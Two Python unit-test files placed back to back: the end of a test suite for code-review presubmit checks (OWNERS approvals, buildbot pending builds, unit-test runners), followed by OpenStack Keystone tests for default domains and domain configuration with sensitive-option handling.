self.MockInputApi(None, True) connection = self.mox.CreateMockAnything() input_api.urllib2.urlopen('uurl').AndReturn(connection) connection.read().AndReturn(""" { 'b1': { 'pending_builds': [0, 1, 2, 3, 4, 5, 6, 7] }, 'foo': { 'pending_builds': [0, 1, 2, 3, 4, 5, 6, 7] }, 'b2': { 'pending_builds': [0] } }""") connection.close() self.mox.ReplayAll() results = presubmit_canned_checks.CheckBuildbotPendingBuilds( input_api, presubmit.OutputApi, 'uurl', 2, ('foo')) self.assertEquals(len(results), 1) self.assertEquals(results[0].__class__, presubmit.OutputApi.PresubmitNotifyResult) def AssertOwnersWorks(self, tbr=False, issue='1', approvers=None, reviewers=None, is_committing=True, rietveld_response=None, uncovered_files=None, expected_output='', manually_specified_reviewers=None, cq_dry_run=False): if approvers is None: # The set of people who lgtm'ed a change. approvers = set() if reviewers is None: # The set of people needed to lgtm a change. We default to # the same list as the people who approved it. We use 'reviewers' # to avoid a name collision w/ owners.py. reviewers = approvers if uncovered_files is None: uncovered_files = set() if manually_specified_reviewers is None: manually_specified_reviewers = [] change = self.mox.CreateMock(presubmit.Change) change.issue = issue change.author_email = '[email protected]' change.R = ','.join(manually_specified_reviewers) change.TBR = '' affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api = self.MockInputApi(change, False) fake_db = self.mox.CreateMock(owners.Database) fake_db.email_regexp = input_api.re.compile(owners.BASIC_EMAIL_REGEXP) input_api.owners_db = fake_db input_api.is_committing = is_committing input_api.tbr = tbr if not is_committing or (not tbr and issue): if not cq_dry_run: affected_file.LocalPath().AndReturn('foo/xyz.cc') change.AffectedFiles(file_filter=None).AndReturn([affected_file]) if issue and not rietveld_response: rietveld_response = { "owner_email": change.author_email, "messages": [ {"sender": a, "text": "I approve", "approval": True} for a in approvers ], "reviewers": reviewers } if is_committing: people = approvers if issue: input_api.rietveld.get_issue_properties( issue=int(input_api.change.issue), messages=None).AndReturn( rietveld_response) else: people = reviewers if not cq_dry_run: if issue: input_api.rietveld.get_issue_properties( issue=int(input_api.change.issue), messages=True).AndReturn( rietveld_response) people.add(change.author_email) fake_db.files_not_covered_by(set(['foo/xyz.cc']), people).AndReturn(uncovered_files) if not is_committing and uncovered_files: fake_db.reviewers_for(set(['foo']), change.author_email).AndReturn(change.author_email) self.mox.ReplayAll() output = presubmit.PresubmitOutput() results = presubmit_canned_checks.CheckOwners(input_api, presubmit.OutputApi) if results: results[0].handle(output) self.assertEquals(output.getvalue(), expected_output) def testCannedCheckOwners_DryRun(self): response = { "owner_email": "[email protected]", "cq_dry_run": True, "reviewers": ["[email protected]"], } self.AssertOwnersWorks(approvers=set(), cq_dry_run=True, rietveld_response=response, reviewers=set(["[email protected]"]), expected_output='This is a CQ dry run, skipping OWNERS check\n') self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_Approved(self): response = { "owner_email": "[email protected]", "messages": [ { "sender": "[email protected]", "text": "foo", "approval": True, }, ], "reviewers": ["[email protected]"], } self.AssertOwnersWorks(approvers=set(['[email protected]']), rietveld_response=response, expected_output='') self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_NotApproved(self): response = { "owner_email": "[email protected]", "messages": [ { "sender": "[email protected]", "text": "foo", "approval": False, }, ], "reviewers": ["[email protected]"], } self.AssertOwnersWorks( approvers=set(), reviewers=set(["[email protected]"]), rietveld_response=response, expected_output= 'Missing LGTM from someone other than [email protected]\n') self.AssertOwnersWorks( approvers=set(), reviewers=set(["[email protected]"]), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_NoReviewers(self): response = { "owner_email": "[email protected]", "messages": [ { "sender": "[email protected]", "text": "foo", "approval": False, }, ], "reviewers":[], } self.AssertOwnersWorks( approvers=set(), reviewers=set(), rietveld_response=response, expected_output= 'Missing LGTM from someone other than [email protected]\n') self.AssertOwnersWorks( approvers=set(), reviewers=set(), is_committing=False, rietveld_response=response, expected_output='') def testCannedCheckOwners_NoIssueNoFiles(self): self.AssertOwnersWorks(issue=None, expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, is_committing=False, expected_output="") def testCannedCheckOwners_NoIssue(self): self.AssertOwnersWorks(issue=None, uncovered_files=set(['foo']), expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, is_committing=False, uncovered_files=set(['foo']), expected_output='Missing OWNER reviewers for these files:\n' ' foo\n') def testCannedCheckOwners_NoIssueLocalReviewers(self): self.AssertOwnersWorks(issue=None, reviewers=set(['[email protected]']), manually_specified_reviewers=['[email protected]'], expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, reviewers=set(['[email protected]']), manually_specified_reviewers=['[email protected]'], is_committing=False, expected_output='') def testCannedCheckOwners_NoIssueLocalReviewersDontInferEmailDomain(self): self.AssertOwnersWorks(issue=None, reviewers=set(['jane']), manually_specified_reviewers=['[email protected]'], expected_output="OWNERS check failed: this change has no Rietveld " "issue number, so we can't check it for approvals.\n") self.AssertOwnersWorks(issue=None, uncovered_files=set(['foo']), manually_specified_reviewers=['jane'], is_committing=False, expected_output='Missing OWNER reviewers for these files:\n' ' foo\n') def testCannedCheckOwners_NoLGTM(self): self.AssertOwnersWorks(expected_output='Missing LGTM from someone ' 'other than [email protected]\n') self.AssertOwnersWorks(is_committing=False, expected_output='') def testCannedCheckOwners_OnlyOwnerLGTM(self): self.AssertOwnersWorks(approvers=set(['[email protected]']), expected_output='Missing LGTM from someone ' 'other than [email protected]\n') self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, expected_output='') def testCannedCheckOwners_TBR(self): self.AssertOwnersWorks(tbr=True, expected_output='--tbr was specified, skipping OWNERS check\n') self.AssertOwnersWorks(tbr=True, is_committing=False, expected_output='') def testCannedCheckOwners_WithoutOwnerLGTM(self): self.AssertOwnersWorks(uncovered_files=set(['foo']), expected_output='Missing LGTM from an OWNER for these files:\n' ' foo\n') self.AssertOwnersWorks(uncovered_files=set(['foo']), is_committing=False, expected_output='Missing OWNER reviewers for these files:\n' ' foo\n') def testCannedCheckOwners_WithLGTMs(self): self.AssertOwnersWorks(approvers=set(['[email protected]']), uncovered_files=set()) self.AssertOwnersWorks(approvers=set(['[email protected]']), is_committing=False, uncovered_files=set()) def testCannedRunUnitTests(self): change = presubmit.Change( 'foo1', 'description1', self.fake_root_dir, None, 0, 0, None) input_api = self.MockInputApi(change, False) input_api.verbose = True unit_tests = ['allo', 'bar.py'] input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) CommHelper(input_api, ['allo', '--verbose'], cwd=self.fake_root_dir) cmd = ['bar.py', '--verbose'] if input_api.platform == 'win32': cmd.insert(0, input_api.python_executable) CommHelper(input_api, cmd, cwd=self.fake_root_dir, ret=(('', None), 1)) self.mox.ReplayAll() results = presubmit_canned_checks.RunUnitTests( input_api, presubmit.OutputApi, unit_tests) self.assertEqual(2, len(results)) self.assertEqual( presubmit.OutputApi.PresubmitNotifyResult, results[0].__class__) self.assertEqual( presubmit.OutputApi.PresubmitPromptWarning, results[1].__class__) self.checkstdout('') def testCannedRunUnitTestsInDirectory(self): change = presubmit.Change( 'foo1', 'description1', self.fake_root_dir, None, 0, 0, None) input_api = self.MockInputApi(change, False) input_api.verbose = True input_api.logging = self.mox.CreateMock(logging) input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) input_api.PresubmitLocalPath().AndReturn(self.fake_root_dir) path = presubmit.os.path.join(self.fake_root_dir, 'random_directory') input_api.os_listdir(path).AndReturn(['.', '..', 'a', 'b', 'c']) input_api.os_path.isfile = lambda x: not x.endswith('.') CommHelper( input_api, [presubmit.os.path.join('random_directory', 'b'), '--verbose'], cwd=self.fake_root_dir) input_api.logging.debug('Found 5 files, running 1') self.mox.ReplayAll() results = presubmit_canned_checks.RunUnitTestsInDirectory( input_api, presubmit.OutputApi, 'random_directory', whitelist=['^a$', '^b$'], blacklist=['a']) self.assertEqual(1, len(results)) self.assertEqual( presubmit.OutputApi.PresubmitNotifyResult, results[0].__class__) self.checkstdout('') def testPanProjectChecks(self): # Make sure it accepts both list and tuples. change = presubmit.Change( 'foo1', 'description1', self.fake_root_dir, None, 0, 0, None) input_api = self.MockInputApi(change, False) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) for _ in range(3): input_api.AffectedFiles(file_filter=mox.IgnoreArg(), include_deletes=False ).AndReturn([affected_file]) affected_file.LocalPath() affected_file.NewContents().AndReturn('Hey!\nHo!\nHey!\nHo!\n\n') affected_file.ChangedContents().AndReturn([ (0, 'Hey!\n'), (1, 'Ho!\n'), (2, 'Hey!\n'), (3, 'Ho!\n'), (4, '\n')]) for _ in range(5): affected_file.LocalPath().AndReturn('hello.py') input_api.AffectedSourceFiles(mox.IgnoreArg()).AndReturn([affected_file]) input_api.ReadFile(affected_file).AndReturn('Hey!\nHo!\nHey!\nHo!\n\n') self.mox.ReplayAll() results = presubmit_canned_checks.PanProjectChecks( input_api, presubmit.OutputApi, excluded_paths=None, text_files=None, license_header=None, project_name=None, owners_check=False) self.assertEqual(1, len(results)) self.assertEqual( 'Found line ending with white spaces in:', results[0]._message) self.checkstdout('') if __name__ == '__main__': import unittest unittest.main()
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import uuid import fixtures import mock from testtools import matchers import keystone.conf from keystone import exception from keystone.tests import unit from keystone.tests.unit.ksfixtures import database CONF = keystone.conf.CONF class TestResourceManagerNoFixtures(unit.SQLDriverOverrides, unit.TestCase): def setUp(self): super(TestResourceManagerNoFixtures, self).setUp() self.useFixture(database.Database(self.sql_driver_version_overrides)) self.load_backends() def test_ensure_default_domain_exists(self): # When there's no default domain, ensure_default_domain_exists creates # it. # First make sure there's no default domain. self.assertRaises( exception.DomainNotFound, self.resource_api.get_domain, CONF.identity.default_domain_id) self.resource_api.ensure_default_domain_exists() default_domain = self.resource_api.get_domain( CONF.identity.default_domain_id) expected_domain = { 'id': CONF.identity.default_domain_id, 'name': 'Default', 'enabled': True, 'description': 'Domain created automatically to support V2.0 ' 'operations.', } self.assertEqual(expected_domain, default_domain) def test_ensure_default_domain_exists_already_exists(self): # When there's already a default domain, ensure_default_domain_exists # doesn't do anything. name = uuid.uuid4().hex description = uuid.uuid4().hex domain_attrs = { 'id': CONF.identity.default_domain_id, 'name': name, 'description': description, } self.resource_api.create_domain(CONF.identity.default_domain_id, domain_attrs) self.resource_api.ensure_default_domain_exists() default_domain = self.resource_api.get_domain( CONF.identity.default_domain_id) expected_domain = { 'id': CONF.identity.default_domain_id, 'name': name, 'enabled': True, 'description': description, } self.assertEqual(expected_domain, default_domain) def test_ensure_default_domain_exists_fails(self): # When there's an unexpected exception creating domain it's passed on. self.useFixture(fixtures.MockPatchObject( self.resource_api, 'create_domain', side_effect=exception.UnexpectedError)) self.assertRaises(exception.UnexpectedError, self.resource_api.ensure_default_domain_exists) def test_update_project_name_conflict(self): name = uuid.uuid4().hex description = uuid.uuid4().hex domain_attrs = { 'id': CONF.identity.default_domain_id, 'name': name, 'description': description, } domain = self.resource_api.create_domain( CONF.identity.default_domain_id, domain_attrs) project1 = unit.new_project_ref(domain_id=domain['id'], name=uuid.uuid4().hex) self.resource_api.create_project(project1['id'], project1) project2 = unit.new_project_ref(domain_id=domain['id'], name=uuid.uuid4().hex) project = self.resource_api.create_project(project2['id'], project2) self.assertRaises(exception.Conflict, self.resource_api.update_project, project['id'], {'name': project1['name']}) class DomainConfigDriverTests(object): def _domain_config_crud(self, sensitive): domain = uuid.uuid4().hex group = uuid.uuid4().hex option = uuid.uuid4().hex value = uuid.uuid4().hex config = {'group': group, 'option': option, 'value': value, 'sensitive': sensitive} self.driver.create_config_options(domain, [config]) res = self.driver.get_config_option( domain, group, option, sensitive) config.pop('sensitive') self.assertEqual(config, res) value = uuid.uuid4().hex config = {'group': group, 'option': option, 'value': value, 'sensitive': sensitive} self.driver.update_config_options(domain, [config]) res = self.driver.get_config_option( domain, group, option, sensitive) config.pop('sensitive') self.assertEqual(config, res) self.driver.delete_config_options(domain, group, option) self.assertRaises(exception.DomainConfigNotFound, self.driver.get_config_option, domain, group, option, sensitive) # ...and silent if we try to delete it again self.driver.delete_config_options(domain, group, option) def test_whitelisted_domain_config_crud(self): self._domain_config_crud(sensitive=False) def test_sensitive_domain_config_crud(self): self._domain_config_crud(sensitive=True) def _list_domain_config(self, sensitive): """Test listing by combination of domain, group & option.""" config1 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} # Put config2 in the same group as config1 config2 = {'group': config1['group'], 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} config3 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': 100, 'sensitive': sensitive} domain = uuid.uuid4().hex self.driver.create_config_options( domain, [config1, config2, config3]) for config in [config1, config2, config3]: config.pop('sensitive') # Try listing all items from a domain res = self.driver.list_config_options( domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(3)) for res_entry in res: self.assertIn(res_entry, [config1, config2, config3]) # Try listing by domain and group res = self.driver.list_config_options( domain, group=config1['group'], sensitive=sensitive) self.assertThat(res, matchers.HasLength(2)) for res_entry in res: self.assertIn(res_entry, [config1, config2]) # Try listing by domain, group and option res = self.driver.list_config_options( domain, group=config2['group'], option=config2['option'], sensitive=sensitive) self.assertThat(res, matchers.HasLength(1)) self.assertEqual(config2, res[0]) def test_list_whitelisted_domain_config_crud(self): self._list_domain_config(False) def test_list_sensitive_domain_config_crud(self): self._list_domain_config(True) def _delete_domain_configs(self, sensitive): """Test deleting by combination of domain, group & option.""" config1 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} # Put config2 and config3 in the same group as config1 config2 = {'group': config1['group'], 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} config3 = {'group': config1['group'], 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} config4 = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} domain = uuid.uuid4().hex self.driver.create_config_options( domain, [config1, config2, config3, config4]) for config in [config1, config2, config3, config4]: config.pop('sensitive') # Try deleting by domain, group and option res = self.driver.delete_config_options( domain, group=config2['group'], option=config2['option']) res = self.driver.list_config_options(domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(3)) for res_entry in res: self.assertIn(res_entry, [config1, config3, config4]) # Try deleting by domain and group res = self.driver.delete_config_options(domain, group=config4['group']) res = self.driver.list_config_options(domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(2)) for res_entry in res: self.assertIn(res_entry, [config1, config3]) # Try deleting all items from a domain res = self.driver.delete_config_options(domain) res = self.driver.list_config_options(domain, sensitive=sensitive) self.assertThat(res, matchers.HasLength(0)) def test_delete_whitelisted_domain_configs(self): self._delete_domain_configs(False) def test_delete_sensitive_domain_configs(self): self._delete_domain_configs(True) def _create_domain_config_twice(self, sensitive): """Test create the same option twice just overwrites.""" config = {'group': uuid.uuid4().hex, 'option': uuid.uuid4().hex, 'value': uuid.uuid4().hex, 'sensitive': sensitive} domain = uuid.uuid4().hex self.driver.create_config_options(domain, [config]) config['value'] = uuid.uuid4().hex self.driver.create_config_options(domain, [config]) res = self.driver.get_config_option( domain, config['group'], config['option'], sensitive) config.pop('sensitive') self.assertEqual(config, res) def test_create_whitelisted_domain_config_twice(self): self._create_domain_config_twice(False) def test_create_sensitive_domain_config_twice(self): self._create_domain_config_twice(True) class DomainConfigTests(object): def setUp(self): self.domain = unit.new_domain_ref() self.resource_api.create_domain(self.domain['id'], self.domain) self.addCleanup(self.clean_up_domain) def clean_up_domain(self): # NOTE(henry-nash): Deleting the domain will also delete any domain # configs for this domain. self.domain['enabled'] = False self.resource_api.update_domain(self.domain['id'], self.domain) self.resource_api.delete_domain(self.domain['id']) del self.domain def test_create_domain_config_including_sensitive_option(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # password is sensitive, so check that the whitelisted portion and # the sensitive piece have been stored in the appropriate locations. res = self.domain_config_api.get_config(self.domain['id']) config_whitelisted = copy.deepcopy(config) config_whitelisted['ldap'].pop('password') self.assertEqual(config_whitelisted, res) res = self.domain_config_api.driver.get_config_option( self.domain['id'], 'ldap', 'password', sensitive=True) self.assertEqual(config['ldap']['password'], res['value']) # Finally, use the non-public API to get back the whole config res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(config, res) def test_get_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) res = self.domain_config_api.get_config(self.domain['id'], group='identity') config_partial = copy.deepcopy(config) config_partial.pop('ldap') self.assertEqual(config_partial, res) res = self.domain_config_api.get_config( self.domain['id'], group='ldap', option='user_tree_dn') self.assertEqual({'user_tree_dn': config['ldap']['user_tree_dn']}, res) # ...but we should fail to get a sensitive option self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id'], group='ldap', option='password') def test_delete_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) self.domain_config_api.delete_config( self.domain['id'], group='identity') config_partial = copy.deepcopy(config) config_partial.pop('identity') config_partial['ldap'].pop('password') res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(config_partial, res) self.domain_config_api.delete_config( self.domain['id'], group='ldap', option='url') config_partial = copy.deepcopy(config_partial) config_partial['ldap'].pop('url') res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(config_partial, res) def test_get_options_not_in_domain_config(self): self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id']) config = {'ldap': {'url': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id'], group='identity') self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.get_config, self.domain['id'], group='ldap', option='user_tree_dn') def test_get_sensitive_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual({}, res) self.domain_config_api.create_config(self.domain['id'], config) res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(config, res) def test_update_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # Try updating a group new_config = {'ldap': {'url': uuid.uuid4().hex, 'user_filter': uuid.uuid4().hex}} res = self.domain_config_api.update_config( self.domain['id'], new_config, group='ldap') expected_config = copy.deepcopy(config) expected_config['ldap']['url'] = new_config['ldap']['url'] expected_config['ldap']['user_filter'] = ( new_config['ldap']['user_filter']) expected_full_config = copy.deepcopy(expected_config) expected_config['ldap'].pop('password') res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(expected_config, res) # The sensitive option should still exist res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(expected_full_config, res) # Try updating a single whitelisted option self.domain_config_api.delete_config(self.domain['id']) self.domain_config_api.create_config(self.domain['id'], config) new_config = {'url': uuid.uuid4().hex} res = self.domain_config_api.update_config( self.domain['id'], new_config, group='ldap', option='url') # Make sure whitelisted and full config is updated expected_whitelisted_config = copy.deepcopy(config) expected_whitelisted_config['ldap']['url'] = new_config['url'] expected_full_config = copy.deepcopy(expected_whitelisted_config) expected_whitelisted_config['ldap'].pop('password') self.assertEqual(expected_whitelisted_config, res) res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(expected_whitelisted_config, res) res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(expected_full_config, res) # Try updating a single sensitive option self.domain_config_api.delete_config(self.domain['id']) self.domain_config_api.create_config(self.domain['id'], config) new_config = {'password': uuid.uuid4().hex} res = self.domain_config_api.update_config( self.domain['id'], new_config, group='ldap', option='password') # The whitelisted config should not have changed... expected_whitelisted_config = copy.deepcopy(config) expected_full_config = copy.deepcopy(config) expected_whitelisted_config['ldap'].pop('password') self.assertEqual(expected_whitelisted_config, res) res = self.domain_config_api.get_config(self.domain['id']) self.assertEqual(expected_whitelisted_config, res) expected_full_config['ldap']['password'] = new_config['password'] res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) # ...but the sensitive piece should have. self.assertEqual(expected_full_config, res) def test_update_invalid_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} # An extra group, when specifying one group should fail self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group='ldap') # An extra option, when specifying one option should fail self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config['ldap'], group='ldap', option='url') # Now try the right number of groups/options, but just not # ones that are in the config provided config = {'ldap': {'user_tree_dn': uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group='identity') self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config['ldap'], group='ldap', option='url') # Now some valid groups/options, but just not ones that are in the # existing config config = {'ldap': {'user_tree_dn': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) config_wrong_group = {'identity': {'driver': uuid.uuid4().hex}} self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.update_config, self.domain['id'], config_wrong_group, group='identity') config_wrong_option = {'url': uuid.uuid4().hex} self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.update_config, self.domain['id'], config_wrong_option, group='ldap', option='url') # And finally just some bad groups/options bad_group = uuid.uuid4().hex config = {bad_group: {'user': uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group=bad_group, option='user') bad_option = uuid.uuid4().hex config = {'ldap': {bad_option: uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.update_config, self.domain['id'], config, group='ldap', option=bad_option) def test_create_invalid_domain_config(self): self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], {}) config = {uuid.uuid4().hex: uuid.uuid4().hex} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) config = {uuid.uuid4().hex: {uuid.uuid4().hex: uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) config = {'ldap': {uuid.uuid4().hex: uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) # Try an option that IS in the standard conf, but neither whitelisted # or marked as sensitive config = {'identity': {'user_tree_dn': uuid.uuid4().hex}} self.assertRaises(exception.InvalidDomainConfig, self.domain_config_api.create_config, self.domain['id'], config) def test_delete_invalid_partial_domain_config(self): config = {'ldap': {'url': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # Try deleting a group not in the config self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.delete_config, self.domain['id'], group='identity') # Try deleting an option not in the config self.assertRaises(exception.DomainConfigNotFound, self.domain_config_api.delete_config, self.domain['id'], group='ldap', option='user_tree_dn') def test_sensitive_substitution_in_domain_config(self): # Create a config that contains a whitelisted option that requires # substitution of a sensitive option. config = {'ldap': {'url': 'my_url/%(password)s', 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # Read back the config with the internal method and ensure that the # substitution has taken place. res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) expected_url = ( config['ldap']['url'] % {'password': config['ldap']['password']}) self.assertEqual(expected_url, res['ldap']['url']) def test_invalid_sensitive_substitution_in_domain_config(self): """Check that invalid substitutions raise warnings.""" mock_log = mock.Mock() invalid_option_config = { 'ldap': {'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} for invalid_option in ['my_url/%(passssword)s', 'my_url/%(password', 'my_url/%(password)', 'my_url/%(password)d']: invalid_option_config['ldap']['url'] = invalid_option self.domain_config_api.create_config( self.domain['id'], invalid_option_config) with mock.patch('keystone.resource.core.LOG', mock_log): res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) mock_log.warning.assert_any_call(mock.ANY) self.assertEqual( invalid_option_config['ldap']['url'], res['ldap']['url']) def test_escaped_sequence_in_domain_config(self): """Check that escaped '%(' doesn't get interpreted.""" mock_log = mock.Mock() escaped_option_config = { 'ldap': {'url': 'my_url/%%(password)s', 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config( self.domain['id'], escaped_option_config) with mock.patch('keystone.resource.core.LOG', mock_log): res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertFalse(mock_log.warn.called) # The escaping '%' should have been removed self.assertEqual('my_url/%(password)s', res['ldap']['url']) @unit.skip_if_cache_disabled('domain_config') def test_cache_layer_get_sensitive_config(self): config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}, 'identity': {'driver': uuid.uuid4().hex}} self.domain_config_api.create_config(self.domain['id'], config) # cache the result res = self.domain_config_api.get_config_with_sensitive_info( self.domain['id']) self.assertEqual(config, res) # delete, bypassing domain config manager api self.domain_config_api.delete_config_options(self.domain['id']) self.assertDictEqual( res, self.domain_config_api.get_config_with_sensitive_info( self.domain['id'])) self.domain_config_api.get_config_with_sensitive_info.invalidate( self.domain_config_api, self.domain['id']) self.assertDictEqual( {}, self.domain_config_api.get_config_with_sensitive_info( self.domain['id'])) def test_delete_domain_deletes_configs(self): """Test domain deletion clears the domain configs.""" domain = unit.new_domain_ref() self.resource_api.create_domain(domain['id'], domain) config = {'ldap': {'url': uuid.uuid4().hex, 'user_tree_dn': uuid.uuid4().hex, 'password': uuid.uuid4().hex}} self.domain_config_api.create_config(domain['id'], config) # Now delete the domain domain['enabled'] = False self.resource_api.update_domain(domain['id'], domain) self.resource_api.delete_domain(domain['id']) # Check domain configs have also been deleted self.assertRaises( exception.DomainConfigNotFound, self.domain_config_api.get_config, domain['id']) # The get_config_with_sensitive_info does not throw an exception if # the config is empty, it just returns an empty dict self.assertDictEqual( {}, self.domain_config_api.get_config_with_sensitive_info( domain['id'])) def test_config_registration(self): type = uuid.uuid4().hex self.domain_config_api.obtain_registration( self.domain['id'], type) self.domain_config_api.release_registration( self.domain['id'], type=type) # Make sure that once someone has it, nobody else can get it. # This includes the domain who already has it. self.domain_config_api.obtain_registration( self.domain['id'], type) self.assertFalse( self.domain_config_api.obtain_registration( self.domain['id'], type)) # Make sure we can read who does have it self.assertEqual( self.domain['id'], self.domain_config_api.read_registration(type)) # Make sure releasing it is silent if the domain specified doesn't # have the registration domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex} self.resource_api.create_domain(domain2['id'], domain2) self.domain_config_api.release_registration( domain2['id'], type=type) # If nobody has the type registered, then trying to read it should # raise ConfigRegistrationNotFound self.domain_config_api.release_registration( self.domain['id'], type=type) self.assertRaises(exception.ConfigRegistrationNotFound, self.domain_config_api.read_registration, type) # Finally check multiple registrations are cleared if you free the # registration without specifying the type type2 = uuid.uuid4().hex self.domain_config_api.obtain_registration( self.domain['id'], type) self.domain_config_api.obtain_registration( self.domain['id'], type2) self.domain_config_api.release_registration(self.domain['id']) self.assertRaises(exception.ConfigRegistrationNotFound, self.domain_config_api.read_registration, type) self.assertRaises(exception.ConfigRegistrationNotFound, self.domain_config_api.read_registration, type2)
